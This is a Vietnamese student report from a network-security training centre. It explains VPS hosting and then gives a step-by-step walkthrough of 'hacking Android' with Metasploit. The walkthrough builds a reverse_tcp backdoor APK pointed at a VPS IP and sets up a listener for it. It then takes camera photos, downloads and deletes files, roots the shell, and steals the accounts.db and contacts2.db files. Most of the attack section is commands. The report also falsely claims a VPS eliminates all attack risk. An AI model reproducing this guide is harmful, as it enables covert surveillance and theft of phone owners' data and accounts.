Hack android dùng metasploit cài trên VPS

1. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO 4
Hack android dùng metasploit cài trên VPS
1
CBHD: Võ Đỗ Thắng
SVTT: Lê Trần Xuân Lãnh

2. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Mục lục
1. VPS là gì? ..................................................................................................................................3
2. Các tính năng và lợi ích của VPS ...............................................................................................3
3. Hack android sử dụng metaspoit cài trên VPS ..........................................................................4
2

3. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
3
1. VPS là gì?
Máy chủ ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo chạy dưới dạng chia sẻ tài nguyên từ máy chủ vật lý ban đầu. Trong khi trên 1
server chạy Share Host thì có thể có hàng trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy
VPS thì con số chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều lần.
Khác với hosting sử dụng phần mềm quản lý (hosting control panel) để khởi tạo và quản lý
các gói hosting, VPS được tạo ra nhờ công nghệ ảo hóa. Số lượng VPS luôn thấp hơn nhiều lần
so với số lượng hosting nếu cài đặt trên cùng một hệ thống server, do đó tính ổn định và hiệu
suất sử dụng tài nguyên của VPS luôn vượt trội so với hosting.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn
công.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên
server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website
khác cùng server, riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác
trên server đều không bị ảnh hưởng.
2. Các tính năng và lợi ích của VPS
Toàn quyền quản lý với tính năng như một máy chủ độc lập.
Độ ổn định và bảo mật cao.
Dễ dàng nâng cấp tài nguyên mà không làm gián đoạn dịch vụ.
Quản trị từ xa, cài đặt các phần mềm và ứng dụng theo nhu cầu
Kết nối Internet với 01 IP tĩnh.
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng Ram
riêng, dung lượng ổ HDD riêng, địa chỉ Ip riêng và hệ điều hành riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có
thể cài đặt để thực hiện những nhu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,
download/upload bittorent với tốc độ cao...
Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không
phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành vời thời gian từ 5-10 phút

4. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
3. Hack android sử dụng metaspoit cài trên VPS
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file
4
vừa tạo.
Sauk hi tạo một backdoor được tạo, ta tải nó lên mạng.
Chờ máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:

5. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
5
Ta vào máy VPS và mở Metasploit Console lên
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một liên kết với máy android mà ta sẽ hack:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run

6. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Chú ý: lhost và lport phải giống với lhost và lport khi tạo backdoor
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
6

7. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
Ta dùng lệnh sysinfo để xem thông tin máy android
Ta dùng lênh webcam_list để xem danh sách các camera
7

8. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
8
Trong đó: x là 1: Back Camera
2: Front Camera
Để di chuyển đến thư mục nào ta dụng lệnh cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì

9. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Ta vào thư mục /sdcard/Download để down file về
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
9
Muốn xóa một file ta dùng lệnh rm <tên file>
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.

10. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
10
Ta dùng lênh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì

11. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
11
Tiếp tục ta vào địa chỉ
/data/data/com.android.providers.contacts/databases

12. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
12
để copy file contacts2.db về Sdcard
Sau đó ta download file contacts2.db về máy VPS

13. Lê Trần Xuân Lãnh – Lớp CNTT – Ca sáng 2-4-6
Bên dưới là danh sách danh bạ ta down từ máy android đã được root. Ta mở file *.db bằng phần
mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta
Hết
13